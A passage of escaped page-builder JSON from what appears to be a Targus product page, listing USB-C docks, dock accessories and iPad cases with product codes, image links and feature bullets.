monitor connection<\\/li><li>1 USB 3.1 Gen 1 5Gbps (USB 3.0) Type-A port<\\/li><li>1 Gigabit Ethernet port<\\/li><li>HDMI includes 6 (5.1) channel audio<\\/li><li>Universal compatibility with popular Windows\\u00ae and macOS\\u2122 platforms<\\/li><li>Compact size that\\u2019s ideal for travel<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"af63771\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a6089bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>mDP (4096 x 2160 p30 max)<\\/li><li>HDMI (4096 x 2160 p30 max)<\\/li><li>VGA (1920 x 1200)<\\/li><li>USB-C upstream cable (Laptop charging capable by PD pass through)<\\/li><li>2 x USB 3.1 Gen 1 type A downstream port<\\/li><li>1 x USB-C PD pass through (up to 60W) port with USB 3.1 Gen 1 downstream data support<\\/li><li>Gigabit Ethernet; Lock Slot<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6bd3110\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e6c4a3d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1f4a7f2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"edce3a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6c36b73\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f56d76e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e61842f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99db6fd\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"aa18c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"adb6db3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"490dda7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1b4a251\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"173a4c8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Dock Accessories\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17016d0\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9c15a98\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4ed087c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C to USB-A Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1104GLX)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0932912\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8825bbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3-Pin 3-Way Hydra DC Power Cable<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACC1009USX)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ce75109\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5870ac3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Multiplexer Adapter<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA46USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4969a2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b576756\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C Alt-Mode Travel Dock w\\/ PD<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(ACA42USZ)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"19c81a5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"ccebe66\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b656cbc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0053546_usb-cf-to-usb-30-am-cable.jpeg\\\" width=\\\"188\\\" height=\\\"188\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1efc850\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f549af5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/www.targus.com\\/content\\/images\\/thumbs\\/0030033_3-pin-3-way-hydra-dc-power-cable.png\\\" width=\\\"187\\\" height=\\\"187\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c69d965\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"42471ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA47GLZ_MAIN1_grande.png?v=1564601685\\\" alt=\\\"USB-C Multiplexer Adapter\\\" width=\\\"189\\\" height=\\\"189\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"aa37978\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"15b0138\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACA42USZ_grande.jpg?v=1553683594\\\" alt=\\\"USB-C\\u2122 Demultiplexer\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5635ad5\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"bac619d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1f7ee4f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>USB Type-C female to USB 3.0 Type-A cable<\\/li><li>10cm long with tether<\\/li><li>Transfers data at rates up to 5 Gbps<\\/li><li>Compatible with Targus DOCK180USZ<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd75d2d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"bcabecd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Powers up to 1 large and 1 small device simultaneously<\\/li><li>Supports three connectors for multi-user and multi-device environments<\\/li><li>Self-locking collars ensure tips and power cable stay in place<\\/li><li>Uses existing Targus power cable and power tips from your powered dock (not included)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30e0068\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"c4be429\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports USB-C laptops<\\/li><li>Works with Targus docks DOCK171USZ, DOCK177USZ, ACP77USZ and ACP71USZ<\\/li><li>Compact size for easy carrying<\\/li><li>Provides up to 85W of power with PD 2.0 and charges USB-C devices that accept charging via the USB-C port<\\/li><li>5 different charge profiles to ensure compatibility<\\/li><li>Includes USB-A, 2-pin DC Power, and 3-pin DC power ports; outputs USB-C<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3c23edb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ea8be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>1 USB-C\\/F port<\\/li><li>Enables support for legacy host devices<\\/li><li>Uses universal 3-pin power tip support<\\/li><li>For use with DOCK 180<\\/li><li>Supports power delivery charging up to 60W<\\/li><li>Supports USB 3.0 data transfer up 5 Gbps<\\/li><li>1 USB 3.0 Type A\\/M cable<\\/li><li>1 Targus 3 pin DC power cable (with tips for various laptop models)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72a48df\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"adce2ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d0ec8ec\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ae9eaf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f4d772a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4e92ea9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"5e24acf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c539844\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0ce0714\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"75cb4ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7bb65b8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4d7d888\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5aab643\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9405cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"7d72c96\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablet Cases\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ed426c2\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"092906a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2d78b2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu\\u00ae Multi-Gen for 9.7\\\" IPad Pro, iPad Air 1, And 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ634GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"93dca52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ab79003\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>3D Protection<\\/strong><strong>\\u2122 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">Multi-Gen for <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">9.7 <\\/strong><strong style=\\\"font-size: 1.25rem;\\\">iPad Pro, iPad Air 1, and 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ635GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6f08dfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"516eeda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Pro-Tek Rotating iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73711GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"98a279c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b3fdbec\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"36a5239\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ634GL_FRONT_grande.png?v=1549412474\\\" alt=\\\"Black VersaVu\\u00ae Classic Case (Black) for iPad\\u00ae (2017\\/2018) (THZ634GL) - Front\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"958ad63\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"c2df414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0024531_3d-protection-case-black-for-ipad-20172018-97-inch-ipad-pro-ipad-air-2-and-ipad-air_1024x1024.jpg?v=1547855512\\\" width=\\\"194\\\" height=\\\"194\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed59759\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"910248c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/THZ73711GL_MAIN1_grande.png?v=1569597181\\\" alt=\\\"Pro-Tek Rotating Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Silver\\\" width=\\\"198\\\" height=\\\"198\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fba5ec6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1e24f29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1914c8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape views<\\/li><li>Adjustable viewing angles and comfortable typing angle<\\/li><li>Precision cut access to controls, ports, and camera<\\/li><li>Tray design enhances audio performance<\\/li><li>Integrated stylus holder protects your Apple Pencil\\u2122 or stylus<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Convenient sleep\\/wake function works with iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b20e73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a748414\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Passes military grade 4ft. drop testing (MIL-STD 810G)<\\/li><li>Infinite viewing angles plus comfortable typing position<\\/li><li>Patent-protected multi-generation tray flexes to fit iPad Pro (9.7-inch), iPad Air 1 and 2<\\/li><li>Flexible tray with reinforced corners and bezel protection<\\/li><li>Precision-cut access to controls, ports, and camera lenses<\\/li><li>Easy-grip textured cover with secure magnetic wrap closure<\\/li><li>Tray design enhances audio performance<\\/li><li>Convenient sleep\\/wake function works with iPad Pro\\u00a0 (9.7-inch), iPad Air 1 and 2<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ffba5a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6ba8511\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Color Black \\/ Charcoal &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing<\\/li><li>Geometric Pro-Tek\\u2122 design enhances protection<\\/li><li>Reinforced corners guard against impact<\\/li><li>Patented 360\\u00b0 rotation for portrait\\/landscape viewing<\\/li><li>Virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision-cut access to controls, ports, and camera<\\/li><li>Audio-enhancing sound scoops boost sound performance<\\/li><li>Secure magnetic wrap closure<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876b52c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"060847f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"29c5815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9410617\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ef66c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8b29bf2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da0f29b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0a24c5\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a7e46e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"356bcf5\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c7e3c56\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"8b4c09e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"178c12b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New Click-In iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73608GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c0be7cb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"da27b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu <\\/strong><strong>iPad 9.7\\\" 2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73803GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dc07dd8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"76e312e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>New VersaVu Signature iPad 9.7\\\" <\\/strong><strong>2018 \\/ 2017 Pro, Air 1 &amp; 2<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(THZ73902GL)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a601f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6e3305b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cff07c5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73608GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"Click-In Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Rose Gold\\\" width=\\\"196\\\" height=\\\"196\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d78178e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c49cf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73803GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Red\\\" width=\\\"195\\\" height=\\\"195\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6eaf744\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"043a47e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/THZ73902GL_MAIN1_grande.jpg?v=1571711592\\\" alt=\\\"VersaVu Signature Case for iPad (6th gen. \\/ 5th gen.), iPad Pro (9.7-inch), iPad Air 2 &amp; iPad Air - Blue\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1b4b865\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"246c1eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4857c6e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Available Color Black\\/Charcoal, Rose Gold &amp; Silver<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Precision cut access to controls, ports, and camera lenses<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e18e471\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04d07d5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal, Blue &amp; Red<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Patented custom-moulded tray with reinforced corners enhances impact protection<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Precision control, port and camera cutouts deliver hassle-free listening and photos<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Magnetic wrap closure ensures secure transport<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"32d27da\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9b51775\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul id=\\\"product-features\\\"><li>Available Color Black\\/Charcoal &amp; Blue<\\/li><li>Passes military grade 4ft. drop testing for robust protection<\\/li><li>Premium fabric\\/faux leather exterior with metallic accents delivers standout style<\\/li><li>Patented 360\\u00b0 rotation for quick-switch portrait\\/landscape viewing<\\/li><li>Adjusts in an instant to deliver virtually infinite viewing angles and comfortable typing position<\\/li><li>Boosts sound with audio-scoops that direct sound toward user<\\/li><li>Secure, metallic snap-close mechanism delivers quick access and striking style<\\/li><li>Premium faux leather hand strap<\\/li><li>Integrated Apple Pencil\\/stylus holder<\\/li><li>Limited lifetime warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2fe6de1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6895690\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cac6c51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c724b9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"afa9c21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6c4b6b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a983d0d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0414077\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e27080\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"52a45e3\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1748b19\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"24f99b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7472688\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>VersaVu <\\/strong><strong>11-inch <\\/strong><strong>iPad<\\/strong><strong>\\u00ae <\\/strong><strong>Pro<\\/strong><\\/h3><p style=\\\"text-align: 